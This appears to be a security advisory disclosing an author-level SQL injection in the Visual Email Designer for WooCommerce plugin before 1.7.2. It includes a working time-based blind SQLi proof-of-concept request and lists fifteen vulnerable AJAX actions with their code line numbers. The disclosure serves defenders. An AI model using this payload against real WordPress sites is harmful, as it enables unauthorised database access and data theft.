Visual Email Designer for WooCommerce < 1.7.2 - Multiple Author+ SQLi

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as author.

PoC

action={INSERT HERE NAME OF ACTION}&swcm;_social_id=socialblockdrag_XpoeK&template;_type=user%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)&template;_id=2&theme;_id=2&securekey;=dd041b294f Action: swcm_social_function ⇒ SQLi at line: 2725 Action: swcm_video_function ⇒ SQLi at line 2510 Action: swcm_footer_function ⇒ SQL at line 2311 Action: swcm_disclaimer_function ⇒ SQLi at line 2537 Action: swcm_image_function ⇒ SQLi at line 2621 Action: swcm_customer_function ⇒ SQLi at line 2940 Action: swcm_delete_widget = SQLi at line 3018 Action: swcm_hr_function = SQLi at line 2423 Action: swcm_maintext_function ⇒ SQLi at line 2339 Action: swcm_multi_image_function ⇒ SQLi at line 2653 Action: swcm_button_function ⇒ SQLi at line 2482 Action: swcm_title_function ⇒ SQLi at line 2596 Action: swcm_clone_widget ⇒ SQLi at line 3087 Action: swcm_order_function ⇒ SQLi at line 2994 Action: swcm_textarea_function ⇒ SQLi at line 2284